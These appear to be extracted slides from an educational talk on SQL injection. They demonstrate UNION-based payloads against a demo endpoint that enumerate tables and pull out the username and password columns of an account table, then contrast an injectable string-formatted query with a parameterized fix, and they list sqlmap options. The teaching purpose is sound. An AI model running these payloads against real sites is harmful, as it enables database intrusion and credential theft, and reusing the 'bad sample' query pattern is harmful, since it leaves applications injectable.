5. If the result of injection is visible
UNION is nice tool
4/32
6. How many columns?
http://xxx.xxx.xxx.xxx:5000/good?
id=1 ORDER BY 5
Internal Server Error
The server encountered an internal error and was unable to
complete your request. Either the server is overloaded or there
is an error in the application.
5/32
7. Replace with fake record
http://xxx.xxx.xxx.xxx:5000/good?
id=1 UNION SELECT 0,’1’,2,3 ORDER BY 1
{"available": 3, "price": 2, "name": "1"}
6/32
9. List Table Name
http://xxx.xxx.xxx.xxx:5000/good?
id=1 UNION
SELECT 0,string_agg(table_name,’,’),2,3
FROM information_schema.tables
WHERE table_schema = ‘public’
GROUP BY table_schema
ORDER BY 1
{"available": 3, "price": 2, "name": “goods,account,…”}
8/32
10. List Column Name
http://xxx.xxx.xxx.xxx:5000/good?
id=1 UNION
SELECT 0,string_agg(column_name,’,’),2,3
FROM information_schema.columns
WHERE table_name = ‘account’
GROUP BY table_name
ORDER BY 1
{"available": 3, "price": 2, "name": “username,password,…”}
9/32
24. Use Placeholder
sql = 'select * from goods where id = {}’.format(_id)
engine.execute(sql).first()
sql = text('select * from goods where id = :id')
engine.execute(sql, id=_id).first()
Bad sample
Good sample
23/32
25. Use Placeholder
select * from goods where id = 1;
prepare good_select as select * from goods where id = $1;
execute good_select(1);
Bad sample
Good sample
24/32
30. --banner
--technique=BEUSTQ
--level=1,2,3,4,5
GET and POST parameters are always tested,
HTTP Cookie header values are tested from level 2
HTTP User-Agent/Referer headers' value is tested from level 3.
--risk=1,2,3,4
The default value is 1 which is innocuous for the majority of SQL
injection points. Risk value 2 adds to the default level the tests for
heavy query time-based SQL injections and value 3 adds also OR-
based SQL injection tests.
--second-order=visible_page_url
Injection Configuration
29/32